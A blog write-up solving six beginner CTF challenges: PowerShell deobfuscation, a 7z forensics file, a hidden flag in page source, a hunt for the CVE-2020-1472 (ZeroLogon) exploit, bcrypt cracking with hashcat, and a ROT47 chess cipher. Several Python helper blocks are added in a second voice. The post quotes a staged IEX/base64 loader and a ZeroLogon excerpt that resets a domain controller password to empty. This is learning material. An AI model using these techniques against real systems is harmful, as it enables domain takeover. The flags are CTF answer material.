Since I have taken Antisyphon training in the past, I am on their email list. I noticed that I received an email from them on November 21st about their Turkey Express Mini CTF. I know about their cyber range but never signed up for it, even though I was curious. Since they released this CTF, I will treat this as a sample for their cyber range. It may not be fair, but I do not have anything to go on.

Challenges
When I signed up for their CTF, I was delighted to see there were only six challenges. While there were only six challenges, I did not want to underestimate them because organizers can make them hard. Surprisingly, only one was genuinely challenging, at least for me.
Without further delay, I will show you how I solved each challenge.
Welcome to the Obfuscation Games!
Category: Reverse Engineering
During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAR+eWMA/xXJMQrCQBCF4as8BtucQKwEO7uAZRict2Yh7oTMNCLefd3q4+d/HDU5rR4JmVeibPpCDdSG/Cfb042GXT+bq8kZp4IL5M7U63z7GsdfBu/9YMRi3viTDosm3BlXAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
A lot of CTFs usually start with an easy question. At my current skill level, I do consider this one easy. If I had encountered this challenge before my 2020 CTF experience, it would probably have taken me a while to figure it out.
Solution 1: CLI
The challenge already gives us a clue that we need to decode Base64, so we will.
andrew@kali:~$ echo 'H4sIAAR+eWMA/xXJMQrCQBCF4as8BtucQKwEO7uAZRict2Yh7oTMNCLefd3q4+d/HDU5rR4JmVeibPpCDdSG/Cfb042GXT+bq8kZp4IL5M7U63z7GsdfBu/9YMRi3viTDosm3BlXAAAA' | base64 -d
~yc��1 Ԇ�'�Ӎ�]?�����f!��4"�}����59� �W�l�B ����|��_��`�b���&�W
As you can see, the decoded data is binary rather than readable text. Binary output like this is usually a file of some kind, so let's redirect it to a file and identify it.
andrew@kali:~$ echo 'H4sIAAR+eWMA/xXJMQrCQBCF4as8BtucQKwEO7uAZRict2Yh7oTMNCLefd3q4+d/HDU5rR4JmVeibPpCDdSG/Cfb042GXT+bq8kZp4IL5M7U63z7GsdfBu/9YMRi3viTDosm3BlXAAAA' | base64 -d > challenge1
Let’s see if it is a valid file. I typically use the file command to find information about a file.
andrew@kali:~$ file challenge1
challenge1: gzip compressed data, last modified: Sun Nov 20 01:08:20 2022, original size modulo 2^32 87
It looks like it is a GZIP file. Let’s add a .gz extension and uncompress the file. Additionally, let’s inspect the result using the file command.
andrew@kali:~$ mv challenge1 challenge1.gz; gzip -d challenge1.gz; file challenge1
challenge1: ASCII text, with no line terminators
Now that we know the type of file, we can use the appropriate software to open it. In this case, we will use the cat command to see the file’s contents.
andrew@kali:~$ cat challenge1
Write-host "The flag is in the encoded payload"; $f = "MetaCTF{decode_decompress_done}"
Flag
MetaCTF{decode_decompress_done}
Solution 2: CyberChef
The fastest way to get the flag is by using CyberChef. I found out about this software during our internal CTF. The recipe that you need is Magic. The Magic recipe will attempt to automatically figure out the right combination of recipes to get the desired output. I suggest you not rely on it since it will not always work for every challenge.
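As an added example (my own code, not the writeup's and not the challenge's), here is a Python script that does the CLI solution's steps statically: it pulls the base64 argument out of a FromBase64String("...") call, unwraps base64, gzip and zlib layers by their magic bytes, and then searches the result for the flag and for staging indicators such as IEX, all without executing the PowerShell. The one-liner it analyzes is constructed to mirror the challenge's structure (gzip inside base64, launched with IEX); the flag inside it is a placeholder, and the function and constant names are mine.

```python
import base64
import binascii
import gzip
import re
import zlib

# Constructed sample that mirrors the challenge's layering (PowerShell inside gzip inside
# base64, launched with IEX). Built here so the example runs offline; it is not the
# challenge's own blob, and the flag is a placeholder.
SAMPLE_PS = 'Write-host "The flag is in the encoded payload"; $f = "MetaCTF{example_flag}"'
SAMPLE_B64 = base64.b64encode(gzip.compress(SAMPLE_PS.encode())).decode()
SAMPLE_COMMAND = (
    '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("' + SAMPLE_B64 + '"));'
    'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
    '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'
)

FLAG_RE = re.compile(r"MetaCTF\{[^}]*\}")
B64_ARG_RE = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# Strings that mark a staged, self-decoding PowerShell one-liner.
INDICATORS = ("IEX", "Invoke-Expression", "FromBase64String", "GzipStream", "MemoryStream")


def looks_base64(data):
    """True if data (bytes) is a well-formed base64 alphabet string, ignoring whitespace."""
    compact = re.sub(rb"\s", b"", data)
    return (len(compact) > 0 and len(compact) % 4 == 0
            and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", compact) is not None)


def peel(blob, max_layers=8):
    """Statically unwrap base64 / gzip / zlib layers.
    Returns [(layer_name, bytes), ...]; the last entry is the innermost content."""
    layers = [("raw", blob)]
    for _ in range(max_layers):
        data = layers[-1][1]
        if data[:2] == b"\x1f\x8b":                       # gzip magic (1f 8b)
            layers.append(("gzip", gzip.decompress(data)))
        elif data[:1] == b"\x78" and data[1:2] in (b"\x01", b"\x5e", b"\x9c", b"\xda"):
            layers.append(("zlib", zlib.decompress(data)))   # common zlib header bytes
        elif looks_base64(data):
            try:
                decoded = base64.b64decode(re.sub(rb"\s", b"", data), validate=True)
            except binascii.Error:
                break
            layers.append(("base64", decoded))
        else:
            break                                          # nothing else recognised
    return layers


def analyze(command):
    """Extract the base64 argument of FromBase64String(...), unwrap it without running
    anything, and report staging indicators, layer order, payload text and flags."""
    lowered = command.lower()
    indicators = [i for i in INDICATORS if i.lower() in lowered]
    m = B64_ARG_RE.search(command)
    if not m:
        return {"indicators": indicators, "layers": [], "payload": None, "flags": []}
    layers = peel(m.group(1).encode())
    payload = layers[-1][1].decode("utf-8", errors="replace")
    return {"indicators": indicators, "layers": [name for name, _ in layers],
            "payload": payload, "flags": FLAG_RE.findall(payload)}


if __name__ == "__main__":
    report = analyze(SAMPLE_COMMAND)
    print("layers:", report["layers"])
    print("indicators:", report["indicators"])
    print("payload:", report["payload"])
    print("flags:", report["flags"])
```

Passing the challenge's own one-liner from the prompt to analyze() performs exactly the base64-then-gzip unwrap the CLI solution does by hand; the layer list tells you the order the stages were applied in, and the indicator list is what a detection rule for this style of staging would key on.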

Staging in 1…2…3
Category: Forensics
The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.
There was a suspicious file created during the timeframe of Threat Actor activity: C:\xyz.tmp (mirror). Can you check it out?
Solution
First, we need to download the file.
andrew@kali:~$ wget https://metaproblems.com/89f75cd8a7cc6b82879c0821e00179e1/xyz.tmp
--2022-11-22 19:58:05--  https://metaproblems.com/89f75cd8a7cc6b82879c0821e00179e1/xyz.tmp
Resolving metaproblems.com (metaproblems.com)... 35.173.187.102
Connecting to metaproblems.com (metaproblems.com)|35.173.187.102|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 192993 (188K)
Saving to: ‘xyz.tmp’

xyz.tmp    100%[==============================================================================================================>] 188.47K  1.16MB/s    in 0.2s

2022-11-22 19:58:06 (1.16 MB/s) - ‘xyz.tmp’ saved [192993/192993]
Second, we need to inspect what kind of file it is.
andrew@kali:~$ file xyz.tmp
xyz.tmp: 7-zip archive data, version 0.4
We need to uncompress the file using the 7zip utility.
andrew@kali:~$ 7z x xyz.tmp

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i3-6100U CPU @ 2.30GHz (306A0),ASM,AES-NI)

Scanning the drive for archives:
1 file, 192993 bytes (189 KiB)

Extracting archive: xyz.tmp
--
Path = xyz.tmp
Type = 7z
Physical Size = 192993
Headers Size = 422
Method = LZMA2:192k
Solid = +
Blocks = 1

Everything is Ok

Folders: 4
Files: 3
Size:       193257
Compressed: 192993
Once uncompressed, we need to figure out what files or directories are present.
andrew@kali:~$ ls -l
total 236
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Desktop
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Documents
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Downloads
drwx------ 5 andrew andrew   4096 Oct 20  2020 MetaCTF{you_might_consider_using_encryption}
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Music
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Pictures
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Public
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Templates
drwxr-xr-t 2 andrew andrew   4096 Jun 11  2021 thinclient_drives
drwxr-xr-x 2 andrew andrew   4096 Jun 11  2021 Videos
-rw-r--r-- 1 andrew andrew 192993 Nov 19 16:56 xyz.tmp
It looks like we do not need to dig further for the flag!
Flag
MetaCTF{you_might_consider_using_encryption}
The Impossible Survey
Your company just developed a new product, and before releasing it to the public, they decided to gauge the reactions from their employees through a survey. As an incentive, the participants get a gift card after completing it. A company-wide email was sent a while ago, yet no one has submitted the survey or claimed the gift card code.
Can you be the first one?

Solution
My first instinct was to enter something in the form. The first value I entered was 42. Yes, it is in reference to The Hitchhiker’s Guide to the Galaxy. When I hit the Next button, I received an error message: “Too short (need at least 50 characters)”.
Next, I entered a bunch of random words to be over 50 characters, but I got the same error message. From there, I decided to look at the page source.
Once I looked at the source, I searched for MetaCTF{ keyword. Sure enough, I found the flag.

Flag
MetaCTF{so_whos_going_to_report_this_bug_to_google}
Diving into the Announcement
Category: Reconnaissance
Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept (POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. At some point, Microsoft announced CVE-2020-1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.
Solution
Using the CVE-2020-1472 exploit keywords on Google, the first result points to this GitHub page. According to the README file, the script resets the DC’s machine account password to an empty string if the DC is vulnerable. Armed with this information, we need to find the function within the script that sets the password to an empty string.
After skimming through the code, I found a section talking about passwords. Then, I noticed a line that has \x00. In Python this escape is a null byte, so a new password of nothing but null bytes is the empty-password reset the README describes, and I figured the function I am looking for is nrpc.NetrServerPasswordSet2.
cve-2020-1472-exploit.py (excerpt)

        ClearNewPassword: A NL_TRUST_PASSWORD structure, as specified in section 2.2.1.3.7,
        that contains the new password encrypted as specified in Calling NetrServerPasswordSet2
        (section 3.4.5.2.5).
            typedef struct _NL_TRUST_PASSWORD {
                WCHAR Buffer[256];
                ULONG Length;
            }
        ReturnAuthenticator: A NETLOGON_AUTHENTICATOR structure, as specified in section 2.2.1.1.5,
        that contains the server return authenticator.
        More info can be found on the [MS-NRPC]-170915.pdf
        """
        request = nrpc.NetrServerPasswordSet2()
        request["PrimaryName"] = dc_handle + "\x00"
        request["AccountName"] = target_computer + "$\x00"
        request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator["Credential"] = b"\x00" * 8
        authenticator["Timestamp"] = 0
        request["Authenticator"] = authenticator
        request["ComputerName"] = target_computer + "\x00"
        request["ClearNewPassword"] = b"\x00" * 516
        return rpc_con.request(request)
Flag
MetaCTF{nrpc.NetrServerPasswordSet2}
A Confident Hash
Check out this hash. Can you crack it? Here’s a wordlist you can use (mirror). You only have 5 attempts to get the flag right.
$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS
Solution
With our internal CTF, I had so much practice with password cracking. The first task in cracking hashes is to find out what kind of hash it is. With hashcat, we can look at the help menu to identify it.
andrew@kali:~$ hashcat --help | grep '$2'
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
Once we identify the hash, we can perform a dictionary attack using the wordlist provided.
andrew@kali:~$ hashcat -a 0 -m 3200 '$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS' confident_dict.txt
hashcat (v6.2.5-364-g308d8f227) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
             You have been warned.

METAL API (Metal 306.2.4)
=========================
* Device #1: Apple M1 Max, 10880/21845 MB, 32MCU

OpenCL API (OpenCL 1.2 (Sep 30 2022 01:38:14)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M1 Max, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 70 MB

Dictionary cache built:
* Filename..: confident_dict.txt
* Passwords.: 75
* Bytes.....: 1099
* Keyspace..: 75
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS:galactica_hash

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJV...U/MWOS
Time.Started.....: Tue Nov 22 22:33:04 2022 (0 secs)
Time.Estimated...: Tue Nov 22 22:33:04 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (confident_dict.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      957 H/s (8.56ms) @ Accel:2 Loops:4 Thr:8 Vec:1
Recovered.Total..: 1/1 (100.00%) Digests
Progress.........: 75/75 (100.00%)
Rejected.........: 0/75 (0.00%)
Restore.Point....: 0/75 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:12-16
Candidate.Engine.: Device Generator
Candidates.#1....: runtime_colossus -> spartan_windows
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util: 93%

Started: Tue Nov 22 22:33:03 2022
Stopped: Tue Nov 22 22:33:06 2022
Flag
MetaCTF{galactica_hash}
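The reason this hash fell to a 75-word dictionary in zero seconds is visible in the hash string itself: the $04$ field is the bcrypt cost factor, and cost 4 is the minimum bcrypt allows. As an added example (my own code, not the writeup's), here is a Python audit that parses bcrypt's modular-crypt format the way the hashcat identification step does, flags hashes whose cost is below policy, and scales the 957 H/s measured in the hashcat run above to a higher cost. The second hash it checks is a constructed, well-formed but fictitious cost-12 string used only to show the audit passing it; the function names and the cost-10 policy threshold are my choices.

```python
import re

# bcrypt modular-crypt format: $<variant>$<2-digit cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# The challenge's hash (cost 04, which is why the dictionary finished in 0 seconds).
CHALLENGE_HASH = "$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS"
# Constructed, well-formed but fictitious cost-12 hash; it verifies no real password.
SAMPLE_STRONG_HASH = "$2b$12$" + "abcdefghijklmnopqrstuv" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
# Throughput hashcat reported in the writeup's run, at the challenge hash's cost.
MEASURED_RATE_HS, MEASURED_COST = 957, 4


def parse_bcrypt(h):
    """Return variant, cost, salt and digest as a dict, or None if h is not a bcrypt hash."""
    m = BCRYPT_RE.match(h)
    if m is None:
        return None
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:            # bcrypt's defined cost range
        return None
    return {"variant": variant, "cost": cost, "salt": salt, "digest": digest,
            "hashcat_mode": 3200}     # hashcat mode for every $2*$ variant


def relative_work(cost, baseline):
    """bcrypt runs 2**cost key-setup rounds, so work doubles with each cost increment."""
    return 2 ** (cost - baseline)


def seconds_to_exhaust(candidates, rate_hs, rate_cost, target_cost):
    """Scale a measured speed (rate_hs at rate_cost) to target_cost and return
    the time needed to try every candidate in a wordlist of that size."""
    scaled_rate = rate_hs / relative_work(target_cost, rate_cost)
    return candidates / scaled_rate


def audit(hashes, min_cost=10):
    """Flag entries that are not bcrypt or whose cost is below policy.
    Returns a list of (hash, cost_or_None, reason)."""
    findings = []
    for h in hashes:
        parsed = parse_bcrypt(h)
        if parsed is None:
            findings.append((h, None, "not a bcrypt hash"))
        elif parsed["cost"] < min_cost:
            factor = relative_work(min_cost, parsed["cost"])
            findings.append((h, parsed["cost"],
                             f"cost {parsed['cost']} is {factor}x cheaper to attack than cost {min_cost}"))
    return findings


if __name__ == "__main__":
    for h, cost, reason in audit([CHALLENGE_HASH, SAMPLE_STRONG_HASH]):
        print(f"{h[:14]}...  cost={cost}  {reason}")
    for cost in (4, 10, 12):
        secs = seconds_to_exhaust(75, MEASURED_RATE_HS, MEASURED_COST, cost)
        print(f"75-word dictionary at cost {cost:2d}: {secs:8.2f} s")
```

At the measured 957 H/s the 75-word list is exhausted in under a tenth of a second at cost 4; the same list at cost 12 takes 256 times longer, about 20 seconds, and a realistic multi-million-line wordlist scales accordingly. The audit is what you would run over a credential store to find hashes like this one before an attacker does.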
King to Queen 3
Category: Cryptography
An employee on the network has been emailing these chess puzzles every day to someone outside of the domain, and nobody really thought it was suspicious until they saw this weird string sent to that same person on the following day:
F^mY;L?t24Zk.m^-hnWl,[l)[ku
The SOC team has provided an archive (mirror) of the email attachments, and has tasked you to investigate the actual contents of the ciphertext. Can you figure out what they’ve been saying?
Hint: The flag is wrapped in MetaCTF{}. This should be enough to help you figure out the encoding.
Solution
I played chess in my teens and was one of the representatives of our school in competitions, so I knew how to record chess moves. No, I was not very good. My record was one game, and it was a draw. Anyway, I figured I must solve each chess puzzle to help figure out the plaintext.
Chess puzzles, typically, give you information about whose turn it is and how many moves before checkmate. Since there was no information, I analyzed each puzzle and figured out that it was white’s move and was checkmate in one.
In the first image, we need to move the queen to the square h7. If we were to record this, the chess notation is Qh7.
Now, we need to solve the second chess puzzle. Again, we need to use the queen piece and move it to A8. The chess notation is Qa8.
Looking at the third chess puzzle, we need to use the rook piece and move it to E7. The chess notation is Re7.
When we look at the fourth chess puzzle, we need to use the pawn piece and move it to D5. Typically, the chess notation for this is d5. However, some folks write it down as Pd5. For this challenge, we will jot it down as Pd5. You will find out why later.
Looking at the fifth chess puzzle, we need to use the bishop piece and move it to B5. The chess notation is Bb5.
When we look at the sixth chess puzzle, we need to use the knight piece and move it to B6. The chess notation is Nb6.
Looking at the seventh chess puzzle, we need to use the rook piece and move it to A8. The chess notation is Ra8.
Looking at the eighth chess puzzle, we need to use the rook piece and move it to H8. The chess notation is Rh8.
Lastly, the ninth chess puzzle requires us to use the queen piece and move it to H8. The chess notation is Qh8.
Bringing it all together
If we add the chess notations together, we have 27 characters. If we count the characters of the ciphertext, we also get 27. It seems like we are on the right track.
What took a while for me was trying to figure out what everything meant. I knew I needed to figure out what cipher the challenge creator used to encrypt the plaintext.
My first instinct was to use ROT13 because it is a commonly used cipher in CTFs. Without thinking, I used it, and it did not work. Then, I realized that the ciphertext had a bunch of special characters. It makes sense that ROT13 did not work.
I then tried other ones, but they did not work. My gut feeling was that the cipher was a derivative of ROT13, so I browsed through CyberChef and found the ROT47 Brute Force recipe.
Looking at the screenshot below, you will notice that the first three characters match exactly the flag format. Also, if you look at the rotation number, it is the same number in the chess notation of the first puzzle.

To confirm this is not a coincidence, change the recipe to ROT47, then change the value to 8. As you can see, the following three characters match the flag format. If you follow the same methodology for the rest, you will get the complete message, which is the flag.

Flag
MetaCTF{99_p3rc3nt_t4ct1cs}
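As an added example (my own code, not the writeup's and not CyberChef's), here is a Python version of the decryption worked out above. ROT47 rotates the 94 printable ASCII characters (codes 33 to 126), and the writeup's methodology is that each puzzle's destination rank digit (Qh7 gives 7, Qa8 gives 8, and so on) is the rotation amount for the next three ciphertext characters, one block per three-character move, which is why the 27-character notation string lines up with the 27-character ciphertext. That per-block mapping is my reading of the writeup and is confirmed by the result; the function names are mine. The brute_force() helper reproduces what the ROT47 Brute Force recipe showed: only one rotation turns the first block into the flag prefix.

```python
# Ciphertext and moves from the challenge; each puzzle is checkmate in one for White.
CIPHERTEXT = "F^mY;L?t24Zk.m^-hnWl,[l)[ku"
MOVES = ["Qh7", "Qa8", "Re7", "Pd5", "Bb5", "Nb6", "Ra8", "Rh8", "Qh8"]
FLAG_PREFIX = "MetaCTF{"


def rot47(text, n):
    """Rotate printable ASCII (codes 33..126, 94 symbols) by n positions.
    Negative n rotates backwards; other characters pass through unchanged."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + n) % 94))
        else:
            out.append(ch)
    return "".join(out)


def blocks_and_rotations(moves):
    """Assumption taken from the writeup: a move's destination rank digit is the ROT47
    amount for a ciphertext block as long as the move's notation (3 characters here)."""
    return [(len(m), int(m[-1])) for m in moves]


def apply_moves(text, moves, direction=1):
    """direction=1 decrypts the challenge ciphertext; direction=-1 re-encrypts plaintext."""
    plan = blocks_and_rotations(moves)
    expected = sum(size for size, _ in plan)
    if expected != len(text):
        raise ValueError(f"notation covers {expected} characters, text has {len(text)}")
    out, pos = [], 0
    for size, n in plan:
        out.append(rot47(text[pos:pos + size], direction * n))
        pos += size
    return "".join(out)


def brute_force(ciphertext, known_prefix=FLAG_PREFIX, width=3):
    """Equivalent of CyberChef's ROT47 Brute Force: which rotations make the first
    block of the ciphertext line up with the known flag prefix?"""
    return [n for n in range(1, 94) if rot47(ciphertext[:width], n) == known_prefix[:width]]


if __name__ == "__main__":
    print("rotation for first block:", brute_force(CIPHERTEXT))
    flag = apply_moves(CIPHERTEXT, MOVES)
    print("decrypted:", flag)
    print("round trip ok:", apply_moves(flag, MOVES, direction=-1) == CIPHERTEXT)
```

Because ROT47 is a bijection on the printable range, brute_force() can return at most one rotation per candidate prefix, which is why the match on the first three characters was not a coincidence. The length check in apply_moves() is the same sanity check the writeup made by counting characters: if the notation and the ciphertext disagree in length, the key is wrong before any rotation is tried.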
Final thoughts
The CTF seems geared toward beginners, and that is okay. We all have to start somewhere. The challenges are not that hard for my current knowledge and skill level. Admittedly, I do consider King to Queen 3 the most challenging one out of all of them.
Participating in CTFs is addicting, at least for me. It can also be infuriating sometimes when I cannot solve the challenges. One of the reasons I like participating in CTF is that I always learn something new. This time around, I learned about ROT47. If you have not participated in one, you should try it and not feel intimidated. I suggest you start with easy ones first and build your skill level to where you can solve more challenging questions. Happy hunting!